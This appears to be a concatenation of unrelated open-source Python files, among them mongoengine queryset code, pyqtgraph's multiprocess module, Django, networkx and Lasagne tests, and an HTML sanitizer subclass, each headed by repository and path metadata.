def _item_frequencies_exec_js(self, field, normalize=False):
"""Uses exec_js to execute"""
freq_func = """
function(path) {
path = path.split('.');
if (options.normalize) {
var total = 0.0;
db[collection].find(query).forEach(function(doc) {
field = doc;
for (p in path) {
if (field)
field = field[path[p]];
else
break;
}
if (field && field.constructor == Array) {
total += field.length;
} else {
total++;
}
});
}
var frequencies = {};
var inc = 1.0;
if (options.normalize) {
inc /= total;
}
db[collection].find(query).forEach(function(doc) {
field = doc;
for (p in path) {
if (field)
field = field[path[p]];
else
break;
}
if (field && field.constructor == Array) {
field.forEach(function(item) {
frequencies[item] = inc + (isNaN(frequencies[item]) ? 0: frequencies[item]);
});
} else {
var item = field;
frequencies[item] = inc + (isNaN(frequencies[item]) ? 0: frequencies[item]);
}
});
return frequencies;
}
"""
data = self.exec_js(freq_func, field, normalize=normalize)
if 'undefined' in data:
data[None] = data['undefined']
del(data['undefined'])
return data
def __repr__(self):
limit = REPR_OUTPUT_SIZE + 1
start = (0 if self._skip is None else self._skip)
if self._limit is None:
stop = start + limit
if self._limit is not None:
if self._limit - start > limit:
stop = start + limit
else:
stop = self._limit
try:
data = list(self[start:stop])
except pymongo.errors.InvalidOperation:
return ".. queryset mid-iteration .."
if len(data) > REPR_OUTPUT_SIZE:
data[-1] = "...(remaining elements truncated)..."
return repr(data)
def select_related(self, max_depth=1):
"""Handles dereferencing of :class:`~bson.dbref.DBRef` objects to
        a maximum depth in order to cut down the number of queries to mongodb.
.. versionadded:: 0.5
"""
from dereference import DeReference
# Make select related work the same for querysets
max_depth += 1
return DeReference()(self, max_depth=max_depth)
class QuerySetManager(object):
get_queryset = None
def __init__(self, queryset_func=None):
if queryset_func:
self.get_queryset = queryset_func
self._collections = {}
def __get__(self, instance, owner):
"""Descriptor for instantiating a new QuerySet object when
Document.objects is accessed.
"""
if instance is not None:
            # Document object being used rather than the document class
return self
# owner is the document that contains the QuerySetManager
queryset_class = owner._meta['queryset_class'] or QuerySet
queryset = queryset_class(owner, owner._get_collection())
if self.get_queryset:
if self.get_queryset.func_code.co_argcount == 1:
queryset = self.get_queryset(queryset)
else:
queryset = self.get_queryset(owner, queryset)
return queryset
def queryset_manager(func):
"""Decorator that allows you to define custom QuerySet managers on
:class:`~mongoengine.Document` classes. The manager must be a function that
accepts a :class:`~mongoengine.Document` class as its first argument, and a
    :class:`~mongoengine.queryset.QuerySet` as its second argument. The
    function should return a :class:`~mongoengine.queryset.QuerySet`, probably
the same one that was passed in, but modified in some way.
"""
if func.func_code.co_argcount == 1:
import warnings
msg = 'Methods decorated with queryset_manager should take 2 arguments'
warnings.warn(msg, DeprecationWarning)
return QuerySetManager(func)
|
wkschwartz/django
|
refs/heads/stable/3.2.x
|
tests/db_functions/text/test_sha224.py
|
17
|
import unittest
from django.db import NotSupportedError, connection
from django.db.models import CharField
from django.db.models.functions import SHA224
from django.test import TestCase
from django.test.utils import register_lookup
from ..models import Author
class SHA224Tests(TestCase):
@classmethod
def setUpTestData(cls):
Author.objects.bulk_create([
Author(alias='John Smith'),
Author(alias='Jordan Élena'),
Author(alias='皇帝'),
Author(alias=''),
Author(alias=None),
])
def test_basic(self):
authors = Author.objects.annotate(
sha224_alias=SHA224('alias'),
).values_list('sha224_alias', flat=True).order_by('pk')
self.assertSequenceEqual(
authors,
[
'a61303c220731168452cb6acf3759438b1523e768f464e3704e12f70',
'2297904883e78183cb118fc3dc21a610d60daada7b6ebdbc85139f4d',
'eba942746e5855121d9d8f79e27dfdebed81adc85b6bf41591203080',
'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f',
'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f'
if connection.features.interprets_empty_strings_as_nulls else None,
],
)
def test_transform(self):
with register_lookup(CharField, SHA224):
authors = Author.objects.filter(
alias__sha224='a61303c220731168452cb6acf3759438b1523e768f464e3704e12f70',
).values_list('alias', flat=True)
self.assertSequenceEqual(authors, ['John Smith'])
@unittest.skipUnless(connection.vendor == 'oracle', "Oracle doesn't support SHA224.")
def test_unsupported(self):
msg = 'SHA224 is not supported on Oracle.'
with self.assertRaisesMessage(NotSupportedError, msg):
Author.objects.annotate(sha224_alias=SHA224('alias')).first()
|
campagnola/acq4
|
refs/heads/develop
|
acq4/pyqtgraph/multiprocess/processes.py
|
3
|
import subprocess, atexit, os, sys, time, random, socket, signal, inspect
import multiprocessing.connection
try:
import cPickle as pickle
except ImportError:
import pickle
from .remoteproxy import RemoteEventHandler, ClosedError, NoResultError, LocalObjectProxy, ObjectProxy
from ..Qt import QT_LIB
from ..util import cprint # color printing for debugging
__all__ = ['Process', 'QtProcess', 'ForkedProcess', 'ClosedError', 'NoResultError']
class Process(RemoteEventHandler):
"""
Bases: RemoteEventHandler
This class is used to spawn and control a new python interpreter.
It uses subprocess.Popen to start the new process and communicates with it
using multiprocessing.Connection objects over a network socket.
By default, the remote process will immediately enter an event-processing
    loop that carries out requests sent from the parent process.
Remote control works mainly through proxy objects::
proc = Process() ## starts process, returns handle
rsys = proc._import('sys') ## asks remote process to import 'sys', returns
## a proxy which references the imported module
rsys.stdout.write('hello\n') ## This message will be printed from the remote
## process. Proxy objects can usually be used
## exactly as regular objects are.
proc.close() ## Request the remote process shut down
Requests made via proxy objects may be synchronous or asynchronous and may
return objects either by proxy or by value (if they are picklable). See
ProxyObject for more information.
"""
_process_count = 1 # just used for assigning colors to each process for debugging
def __init__(self, name=None, target=None, executable=None, copySysPath=True, debug=False, timeout=20, wrapStdout=None, pyqtapis=None):
"""
============== =============================================================
**Arguments:**
name Optional name for this process used when printing messages
from the remote process.
target Optional function to call after starting remote process.
By default, this is startEventLoop(), which causes the remote
process to handle requests from the parent process until it
is asked to quit. If you wish to specify a different target,
it must be picklable (bound methods are not).
copySysPath If True, copy the contents of sys.path to the remote process.
If False, then only the path required to import pyqtgraph is
added.
debug If True, print detailed information about communication
with the child process.
wrapStdout If True (default on windows) then stdout and stderr from the
child process will be caught by the parent process and
forwarded to its stdout/stderr. This provides a workaround
for a python bug: http://bugs.python.org/issue3905
but has the side effect that child output is significantly
delayed relative to the parent output.
pyqtapis Optional dictionary of PyQt API version numbers to set before
importing pyqtgraph in the remote process.
============== =============================================================
"""
if target is None:
target = startEventLoop
if name is None:
name = str(self)
if executable is None:
executable = sys.executable
self.debug = 7 if debug is True else False # 7 causes printing in white
## random authentication key
authkey = os.urandom(20)
## Windows seems to have a hard time with hmac
if sys.platform.startswith('win'):
authkey = None
#print "key:", ' '.join([str(ord(x)) for x in authkey])
## Listen for connection from remote process (and find free port number)
l = multiprocessing.connection.Listener(('localhost', 0), authkey=authkey)
port = l.address[1]
## start remote process, instruct it to run target function
if copySysPath:
sysPath = sys.path
else:
# what path do we need to make target importable?
mod = inspect.getmodule(target)
modroot = sys.modules[mod.__name__.split('.')[0]]
sysPath = os.path.abspath(os.path.join(os.path.dirname(modroot.__file__), '..'))
bootstrap = os.path.abspath(os.path.join(os.path.dirname(__file__), 'bootstrap.py'))
self.debugMsg('Starting child process (%s %s)' % (executable, bootstrap))
# Decide on printing color for this process
if debug:
procDebug = (Process._process_count%6) + 1 # pick a color for this process to print in
Process._process_count += 1
else:
procDebug = False
if wrapStdout is None:
wrapStdout = sys.platform.startswith('win')
if wrapStdout:
## note: we need all three streams to have their own PIPE due to this bug:
## http://bugs.python.org/issue3905
stdout = subprocess.PIPE
stderr = subprocess.PIPE
self.proc = subprocess.Popen((executable, bootstrap), stdin=subprocess.PIPE, stdout=stdout, stderr=stderr)
## to circumvent the bug and still make the output visible, we use
## background threads to pass data from pipes to stdout/stderr
self._stdoutForwarder = FileForwarder(self.proc.stdout, "stdout", procDebug)
self._stderrForwarder = FileForwarder(self.proc.stderr, "stderr", procDebug)
else:
self.proc = subprocess.Popen((executable, bootstrap), stdin=subprocess.PIPE)
targetStr = pickle.dumps(target) ## double-pickle target so that child has a chance to
## set its sys.path properly before unpickling the target
pid = os.getpid() # we must send pid to child because windows does not have getppid
## Send everything the remote process needs to start correctly
data = dict(
name=name+'_child',
port=port,
authkey=authkey,
ppid=pid,
targetStr=targetStr,
path=sysPath,
qt_lib=QT_LIB,
debug=procDebug,
pyqtapis=pyqtapis,
)
pickle.dump(data, self.proc.stdin)
self.proc.stdin.close()
## open connection for remote process
self.debugMsg('Listening for child process on port %d, authkey=%s..' % (port, repr(authkey)))
while True:
try:
conn = l.accept()
break
except IOError as err:
if err.errno == 4: # interrupted; try again
continue
else:
raise
RemoteEventHandler.__init__(self, conn, name+'_parent', pid=self.proc.pid, debug=self.debug)
self.debugMsg('Connected to child process.')
atexit.register(self.join)
def join(self, timeout=10):
self.debugMsg('Joining child process..')
if self.proc.poll() is None:
self.close()
start = time.time()
while self.proc.poll() is None:
if timeout is not None and time.time() - start > timeout:
raise Exception('Timed out waiting for remote process to end.')
time.sleep(0.05)
self.conn.close()
self.debugMsg('Child process exited. (%d)' % self.proc.returncode)
def debugMsg(self, msg, *args):
if hasattr(self, '_stdoutForwarder'):
## Lock output from subprocess to make sure we do not get line collisions
with self._stdoutForwarder.lock:
with self._stderrForwarder.lock:
RemoteEventHandler.debugMsg(self, msg, *args)
else:
RemoteEventHandler.debugMsg(self, msg, *args)
def startEventLoop(name, port, authkey, ppid, debug=False):
if debug:
import os
cprint.cout(debug, '[%d] connecting to server at port localhost:%d, authkey=%s..\n'
% (os.getpid(), port, repr(authkey)), -1)
conn = multiprocessing.connection.Client(('localhost', int(port)), authkey=authkey)
if debug:
cprint.cout(debug, '[%d] connected; starting remote proxy.\n' % os.getpid(), -1)
global HANDLER
#ppid = 0 if not hasattr(os, 'getppid') else os.getppid()
HANDLER = RemoteEventHandler(conn, name, ppid, debug=debug)
while True:
try:
HANDLER.processRequests() # exception raised when the loop should exit
time.sleep(0.01)
except ClosedError:
HANDLER.debugMsg('Exiting server loop.')
sys.exit(0)
class ForkedProcess(RemoteEventHandler):
"""
ForkedProcess is a substitute for Process that uses os.fork() to generate a new process.
This is much faster than starting a completely new interpreter and child processes
automatically have a copy of the entire program state from before the fork. This
makes it an appealing approach when parallelizing expensive computations. (see
also Parallelizer)
However, fork() comes with some caveats and limitations:
- fork() is not available on Windows.
- It is not possible to have a QApplication in both parent and child process
(unless both QApplications are created _after_ the call to fork())
Attempts by the forked process to access Qt GUI elements created by the parent
will most likely cause the child to crash.
- Likewise, database connections are unlikely to function correctly in a forked child.
- Threads are not copied by fork(); the new process
will have only one thread that starts wherever fork() was called in the parent process.
- Forked processes are unceremoniously terminated when join() is called; they are not
given any opportunity to clean up. (This prevents them calling any cleanup code that
was only intended to be used by the parent process)
- Normally when fork()ing, open file handles are shared with the parent process,
which is potentially dangerous. ForkedProcess is careful to close all file handles
that are not explicitly needed--stdout, stderr, and a single pipe to the parent
process.
"""
def __init__(self, name=None, target=0, preProxy=None, randomReseed=True):
"""
When initializing, an optional target may be given.
If no target is specified, self.eventLoop will be used.
If None is given, no target will be called (and it will be up
to the caller to properly shut down the forked process)
preProxy may be a dict of values that will appear as ObjectProxy
in the remote process (but do not need to be sent explicitly since
        they are available immediately before the call to fork()).
        Proxies will be available as self.forkedProxies[name].
If randomReseed is True, the built-in random and numpy.random generators
will be reseeded in the child process.
"""
self.hasJoined = False
if target == 0:
target = self.eventLoop
if name is None:
name = str(self)
conn, remoteConn = multiprocessing.Pipe()
proxyIDs = {}
if preProxy is not None:
for k, v in preProxy.items():
proxyId = LocalObjectProxy.registerObject(v)
proxyIDs[k] = proxyId
ppid = os.getpid() # write this down now; windows doesn't have getppid
pid = os.fork()
if pid == 0:
self.isParent = False
## We are now in the forked process; need to be extra careful what we touch while here.
## - no reading/writing file handles/sockets owned by parent process (stdout is ok)
## - don't touch QtGui or QApplication at all; these are landmines.
## - don't let the process call exit handlers
os.setpgrp() ## prevents signals (notably keyboard interrupt) being forwarded from parent to this process
## close all file handles we do not want shared with parent
conn.close()
sys.stdin.close() ## otherwise we screw with interactive prompts.
fid = remoteConn.fileno()
os.closerange(3, fid)
os.closerange(fid+1, 4096) ## just guessing on the maximum descriptor count..
## Override any custom exception hooks
def excepthook(*args):
import traceback
traceback.print_exception(*args)
sys.excepthook = excepthook
## Make it harder to access QApplication instance
for qtlib in ('PyQt4', 'PySide', 'PyQt5'):
if qtlib in sys.modules:
sys.modules[qtlib+'.QtGui'].QApplication = None
sys.modules.pop(qtlib+'.QtGui', None)
sys.modules.pop(qtlib+'.QtCore', None)
## sabotage atexit callbacks
atexit._exithandlers = []
atexit.register(lambda: os._exit(0))
if randomReseed:
if 'numpy.random' in sys.modules:
sys.modules['numpy.random'].seed(os.getpid() ^ int(time.time()*10000%10000))
if 'random' in sys.modules:
sys.modules['random'].seed(os.getpid() ^ int(time.time()*10000%10000))
#ppid = 0 if not hasattr(os, 'getppid') else os.getppid()
RemoteEventHandler.__init__(self, remoteConn, name+'_child', pid=ppid)
self.forkedProxies = {}
for name, proxyId in proxyIDs.items():
self.forkedProxies[name] = ObjectProxy(ppid, proxyId=proxyId, typeStr=repr(preProxy[name]))
if target is not None:
target()
else:
self.isParent = True
self.childPid = pid
remoteConn.close()
RemoteEventHandler.handlers = {} ## don't want to inherit any of this from the parent.
RemoteEventHandler.__init__(self, conn, name+'_parent', pid=pid)
atexit.register(self.join)
def eventLoop(self):
while True:
try:
self.processRequests() # exception raised when the loop should exit
time.sleep(0.01)
except ClosedError:
break
except:
print("Error occurred in forked event loop:")
sys.excepthook(*sys.exc_info())
sys.exit(0)
def join(self, timeout=10):
if self.hasJoined:
return
#os.kill(pid, 9)
try:
self.close(callSync='sync', timeout=timeout, noCleanup=True) ## ask the child process to exit and require that it return a confirmation.
except IOError: ## probably remote process has already quit
pass
try:
os.waitpid(self.childPid, 0)
except OSError: ## probably remote process has already quit
pass
self.conn.close() # don't leak file handles!
self.hasJoined = True
def kill(self):
"""Immediately kill the forked remote process.
This is generally safe because forked processes are already
expected to _avoid_ any cleanup at exit."""
os.kill(self.childPid, signal.SIGKILL)
self.hasJoined = True
##Special set of subclasses that implement a Qt event loop instead.
class RemoteQtEventHandler(RemoteEventHandler):
def __init__(self, *args, **kwds):
RemoteEventHandler.__init__(self, *args, **kwds)
def startEventTimer(self):
from ..Qt import QtGui, QtCore
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.processRequests)
self.timer.start(10)
def processRequests(self):
try:
RemoteEventHandler.processRequests(self)
except ClosedError:
from ..Qt import QtGui, QtCore
QtGui.QApplication.instance().quit()
self.timer.stop()
#raise SystemExit
class QtProcess(Process):
"""
QtProcess is essentially the same as Process, with two major differences:
- The remote process starts by running startQtEventLoop() which creates a
QApplication in the remote process and uses a QTimer to trigger
remote event processing. This allows the remote process to have its own
GUI.
- A QTimer is also started on the parent process which polls for requests
from the child process. This allows Qt signals emitted within the child
process to invoke slots on the parent process and vice-versa. This can
be disabled using processRequests=False in the constructor.
Example::
proc = QtProcess()
rQtGui = proc._import('PyQt4.QtGui')
btn = rQtGui.QPushButton('button on child process')
btn.show()
def slot():
print('slot invoked on parent process')
btn.clicked.connect(proxy(slot)) # be sure to send a proxy of the slot
"""
def __init__(self, **kwds):
if 'target' not in kwds:
kwds['target'] = startQtEventLoop
from ..Qt import QtGui ## avoid module-level import to keep bootstrap snappy.
self._processRequests = kwds.pop('processRequests', True)
if self._processRequests and QtGui.QApplication.instance() is None:
raise Exception("Must create QApplication before starting QtProcess, or use QtProcess(processRequests=False)")
Process.__init__(self, **kwds)
self.startEventTimer()
def startEventTimer(self):
from ..Qt import QtCore ## avoid module-level import to keep bootstrap snappy.
self.timer = QtCore.QTimer()
if self._processRequests:
self.startRequestProcessing()
def startRequestProcessing(self, interval=0.01):
"""Start listening for requests coming from the child process.
This allows signals to be connected from the child process to the parent.
"""
self.timer.timeout.connect(self.processRequests)
self.timer.start(interval*1000)
def stopRequestProcessing(self):
self.timer.stop()
def processRequests(self):
try:
Process.processRequests(self)
except ClosedError:
self.timer.stop()
def startQtEventLoop(name, port, authkey, ppid, debug=False):
if debug:
import os
cprint.cout(debug, '[%d] connecting to server at port localhost:%d, authkey=%s..\n' % (os.getpid(), port, repr(authkey)), -1)
conn = multiprocessing.connection.Client(('localhost', int(port)), authkey=authkey)
if debug:
cprint.cout(debug, '[%d] connected; starting remote proxy.\n' % os.getpid(), -1)
from ..Qt import QtGui, QtCore
app = QtGui.QApplication.instance()
#print app
if app is None:
app = QtGui.QApplication([])
app.setQuitOnLastWindowClosed(False) ## generally we want the event loop to stay open
## until it is explicitly closed by the parent process.
global HANDLER
HANDLER = RemoteQtEventHandler(conn, name, ppid, debug=debug)
HANDLER.startEventTimer()
app.exec_()
import threading
class FileForwarder(threading.Thread):
"""
Background thread that forwards data from one pipe to another.
This is used to catch data from stdout/stderr of the child process
    and print it back out to stdout/stderr. We need this because of a
    Python bug (http://bugs.python.org/issue3905) that _requires_ us to
    catch stdout/stderr.
*output* may be a file or 'stdout' or 'stderr'. In the latter cases,
sys.stdout/stderr are retrieved once for every line that is output,
which ensures that the correct behavior is achieved even if
sys.stdout/stderr are replaced at runtime.
"""
def __init__(self, input, output, color):
threading.Thread.__init__(self)
self.input = input
self.output = output
self.lock = threading.Lock()
self.daemon = True
self.color = color
self.start()
def run(self):
if self.output == 'stdout' and self.color is not False:
while True:
line = self.input.readline()
with self.lock:
cprint.cout(self.color, line, -1)
elif self.output == 'stderr' and self.color is not False:
while True:
line = self.input.readline()
with self.lock:
cprint.cerr(self.color, line, -1)
else:
if isinstance(self.output, str):
self.output = getattr(sys, self.output)
while True:
line = self.input.readline()
with self.lock:
try:
self.output.write(line)
except TypeError:
self.output.write(line.decode())
|
ftomassetti/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyUnresolvedReferencesInspection/superType.py
|
83
|
class A1(object):
def method1(self):
pass
class A2(A1):
def method2(self):
print 'm2'
class B(A2):
def method2(self):
super(A2, self).<warning descr="Unresolved attribute reference 'method2' for class 'A1'">method2</warning>() #method2 should be highlighted as unresolved.
B().method2()
|
brycepg/cave-dweller
|
refs/heads/master
|
tests/test_bench_gen_map.py
|
1
|
import unittest
import random
from cave_dweller.game import Game
from cave_dweller.gen_map import gen_map as c_gen_map
from cave_dweller.gen_map import generate_obstacle_map
from .test_gen_map import zero_map, obs_map
def test_benchmark_map(benchmark):
# One time only
result = benchmark.pedantic(c_gen_map, args=(0, 0, 0), rounds=50)
#assert result == zero_map
#def test_c_gen_map(benchmark):
# result = benchmark.pedantic(c_gen_map, args=(0, 0, 0), rounds=50)
# assert result == zero_map
def test_benchmark_obstacle_map(benchmark):
# One time only
result = benchmark.pedantic(generate_obstacle_map, args=(zero_map, 96), rounds=50)
#assert result == obs_map
|
MiLk/ansible-modules-core
|
refs/heads/devel
|
source_control/__init__.py
|
12133432
| |
bretlowery/snakr
|
refs/heads/master
|
lib/django/conf/locale/zh_Hans/__init__.py
|
12133432
| |
shacker/django
|
refs/heads/master
|
tests/view_tests/tests/__init__.py
|
12133432
| |
wangxiangyu/horizon
|
refs/heads/stable/kilo
|
openstack_dashboard/dashboards/project/data_processing/__init__.py
|
12133432
| |
kartikdhar/djangotest
|
refs/heads/master
|
virt1/lib/python2.7/site-packages/django/contrib/admin/migrations/__init__.py
|
12133432
| |
HyperloopTeam/FullOpenMDAO
|
refs/heads/master
|
lib/python2.7/site-packages/networkx-1.9.1-py2.7.egg/networkx/readwrite/tests/test_yaml.py
|
40
|
"""
Unit tests for yaml.
"""
import os,tempfile
from nose import SkipTest
from nose.tools import assert_equal
import networkx as nx
from networkx.testing import assert_edges_equal, assert_nodes_equal
class TestYaml(object):
@classmethod
def setupClass(cls):
global yaml
try:
import yaml
except ImportError:
raise SkipTest('yaml not available.')
def setUp(self):
self.build_graphs()
def build_graphs(self):
self.G = nx.Graph(name="test")
e = [('a','b'),('b','c'),('c','d'),('d','e'),('e','f'),('a','f')]
self.G.add_edges_from(e)
self.G.add_node('g')
self.DG = nx.DiGraph(self.G)
self.MG = nx.MultiGraph()
self.MG.add_weighted_edges_from([(1,2,5),(1,2,5),(1,2,1),(3,3,42)])
def assert_equal(self, G, data=False):
(fd, fname) = tempfile.mkstemp()
nx.write_yaml(G, fname)
Gin = nx.read_yaml(fname);
assert_nodes_equal(G.nodes(), Gin.nodes())
assert_edges_equal(G.edges(data=data), Gin.edges(data=data))
os.close(fd)
os.unlink(fname)
def testUndirected(self):
self.assert_equal(self.G, False)
def testDirected(self):
self.assert_equal(self.DG, False)
def testMultiGraph(self):
self.assert_equal(self.MG, True)
|
ovresko/erpnext
|
refs/heads/master
|
erpnext/education/doctype/grading_scale/test_grading_scale.py
|
47
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
# test_records = frappe.get_test_records('Grading Scale')
class TestGradingScale(unittest.TestCase):
pass
|
dnuffer/Lasagne
|
refs/heads/master
|
lasagne/tests/layers/test_normalization.py
|
3
|
# -*- coding: utf-8 -*-
"""
This file contains code from pylearn2, which is covered by the following
license:
Copyright (c) 2011--2014, Université de Montréal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import numpy as np
import pytest
import theano
import lasagne
def ground_truth_normalizer(c01b, k, n, alpha, beta):
out = np.zeros(c01b.shape)
for r in range(out.shape[1]):
for c in range(out.shape[2]):
for x in range(out.shape[3]):
out[:, r, c, x] = ground_truth_normalize_row(
row=c01b[:, r, c, x],
k=k, n=n, alpha=alpha, beta=beta)
return out
def ground_truth_normalize_row(row, k, n, alpha, beta):
assert row.ndim == 1
out = np.zeros(row.shape)
for i in range(row.shape[0]):
s = k
tot = 0
for j in range(max(0, i-n//2), min(row.shape[0], i+n//2+1)):
tot += 1
sq = row[j] ** 2.
assert sq > 0.
assert s >= k
assert alpha > 0.
s += alpha * sq
assert s >= k
assert tot <= n
assert s >= k
s = s ** beta
out[i] = row[i] / s
return out
class TestLocalResponseNormalization2DLayer:
@pytest.fixture
def rng(self):
return np.random.RandomState([2013, 2])
@pytest.fixture
def input_data(self, input_layer, rng):
return rng.randn(*input_layer.shape).astype(theano.config.floatX)
@pytest.fixture
def input_layer(self):
from lasagne.layers.input import InputLayer
channels = 15
rows = 3
cols = 4
batch_size = 2
shape = (batch_size, channels, rows, cols)
return InputLayer(shape)
@pytest.fixture
def layer(self, input_layer):
from lasagne.layers.normalization import\
LocalResponseNormalization2DLayer
layer = LocalResponseNormalization2DLayer(input_layer,
alpha=1.5,
k=2,
beta=0.75,
n=5)
return layer
def test_get_params(self, layer):
assert len(layer.get_params()) == 0
def test_get_bias_params(self, layer):
assert len(layer.get_bias_params()) == 0
def test_normalization(self, input_data, input_layer, layer):
X = input_layer.input_var
lrn = theano.function([X], layer.get_output(X))
out = lrn(input_data)
# ground_truth_normalizer assumes c01b
input_data_c01b = input_data.transpose([1, 2, 3, 0])
ground_out = ground_truth_normalizer(input_data_c01b,
n=layer.n, k=layer.k,
alpha=layer.alpha,
beta=layer.beta)
ground_out = np.transpose(ground_out, [3, 0, 1, 2])
assert out.shape == ground_out.shape
assert np.allclose(out, ground_out)
|
SmithsonianEnterprises/djangocms-text-ckeditor
|
refs/heads/master
|
djangocms_text_ckeditor/sanitizer.py
|
4
|
from html5lib import sanitizer
class AllowTokenParser():
def parse(self, attribute, val):
raise NotImplementedError
class TextSanitizer(sanitizer.HTMLSanitizer):
allow_token_parsers = []
def allowed_token(self, token, token_type):
data_found = False
allowed_attributes = sanitizer.HTMLSanitizer.allowed_attributes
allowed_attributes_len = len(allowed_attributes)
for data in token['data']:
for allow_token_parser in self.allow_token_parsers:
if allow_token_parser().parse(data[0], data[1]) and data[0] not in allowed_attributes:
sanitizer.HTMLSanitizer.allowed_attributes.append(data[0])
data_found = True
allowed_token_res = super(TextSanitizer, self).allowed_token(token, token_type)
if data_found:
old_allowed_attributes = allowed_attributes[0:allowed_attributes_len]
sanitizer.HTMLSanitizer.allowed_attributes = old_allowed_attributes
return allowed_token_res
|
trezorg/django
|
refs/heads/master
|
tests/modeltests/model_inheritance_same_model_name/models.py
|
103
|
"""
XX. Model inheritance
Model inheritance across apps can result in models with the same name, creating
the need for an %(app_label)s format string. This app specifically tests
this feature by redefining the Copy model from model_inheritance/models.py
"""
from django.db import models
from modeltests.model_inheritance.models import NamedURL
#
# Abstract base classes with related models
#
class Copy(NamedURL):
content = models.TextField()
def __unicode__(self):
return self.content
|
crdoconnor/olympia
|
refs/heads/master
|
apps/amo/tests/test_middleware.py
|
11
|
# -*- coding: utf-8 -*-
from django import http, test
from django.conf import settings
from django.test.client import RequestFactory
import pytest
from commonware.middleware import ScrubRequestOnException
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
from amo.middleware import NoAddonsMiddleware, NoVarySessionMiddleware
from amo.urlresolvers import reverse
from zadmin.models import Config
pytestmark = pytest.mark.django_db
class TestMiddleware(amo.tests.TestCase):
def test_no_vary_cookie(self):
# We don't break good usage of Vary.
response = test.Client().get('/')
eq_(response['Vary'], 'Accept-Language, User-Agent, X-Mobile')
# But we do prevent Vary: Cookie.
response = test.Client().get('/', follow=True)
eq_(response['Vary'], 'X-Mobile, User-Agent')
@patch('django.contrib.sessions.middleware.'
'SessionMiddleware.process_request')
def test_session_not_used_api(self, process_request):
req = RequestFactory().get('/')
req.API = True
NoVarySessionMiddleware().process_request(req)
assert not process_request.called
@patch('django.contrib.sessions.middleware.'
'SessionMiddleware.process_request')
def test_session_not_used(self, process_request):
req = RequestFactory().get('/')
NoVarySessionMiddleware().process_request(req)
assert process_request.called
def test_redirect_with_unicode_get():
response = test.Client().get(
'/da/firefox/addon/5457?from=/da/firefox/'
'addon/5457%3Fadvancedsearch%3D1&lang=ja&utm_source=Google+%E3'
'%83%90%E3%82%BA&utm_medium=twitter&utm_term=Google+%E3%83%90%'
'E3%82%BA')
eq_(response.status_code, 301)
assert 'utm_term=Google+%E3%83%90%E3%82%BA' in response['Location']
def test_source_with_wrong_unicode_get():
# The following url is a string (bytes), not unicode.
response = test.Client().get('/firefox/collections/mozmj/autumn/'
'?source=firefoxsocialmedia\x14\x85')
eq_(response.status_code, 301)
assert response['Location'].endswith('?source=firefoxsocialmedia%14')
def test_trailing_slash_middleware():
response = test.Client().get(u'/en-US/about/?xxx=\xc3')
eq_(response.status_code, 301)
assert response['Location'].endswith('/en-US/about?xxx=%C3%83')
class AdminMessageTest(amo.tests.TestCase):
def test_message(self):
c = Config.objects.create(key='site_notice', value='ET Sighted.')
r = self.client.get(reverse('home'), follow=True)
doc = pq(r.content)
eq_(doc('#site-notice').text(), 'ET Sighted.')
c.delete()
r = self.client.get(reverse('home'), follow=True)
doc = pq(r.content)
eq_(len(doc('#site-notice')), 0)
def test_hide_password_middleware():
request = RequestFactory().post('/', dict(x=1, password=2, password2=2))
request.POST._mutable = False
ScrubRequestOnException().process_exception(request, Exception())
eq_(request.POST['x'], '1')
eq_(request.POST['password'], '******')
eq_(request.POST['password2'], '******')
class TestNoAddonsMiddleware(amo.tests.TestCase):
@patch('amo.middleware.ViewMiddleware.get_name')
def process(self, name, get_name):
get_name.return_value = name
request = RequestFactory().get('/')
view = Mock()
return NoAddonsMiddleware().process_view(request, view, [], {})
@patch.object(settings, 'NO_ADDONS_MODULES',
('some.addons',))
def test_middleware(self):
self.assertRaises(http.Http404, self.process, 'some.addons')
self.assertRaises(http.Http404, self.process, 'some.addons.thingy')
assert not self.process('something.else')
|
Atilla106/members.atilla.org
|
refs/heads/dev
|
network/forms/__init__.py
|
12133432
| |
admed/molgears
|
refs/heads/master
|
templates/myaccount/__init__.py
|
12133432
| |
lmregus/Portfolio
|
refs/heads/master
|
python/design_patterns/env/lib/python3.7/site-packages/IPython/terminal/tests/__init__.py
|
12133432
| |
wbtuomela/mezzanine
|
refs/heads/master
|
mezzanine/project_template/project_name/__init__.py
|
12133432
| |
osen000/python_task
|
refs/heads/master
|
test/__init__.py
|
12133432
|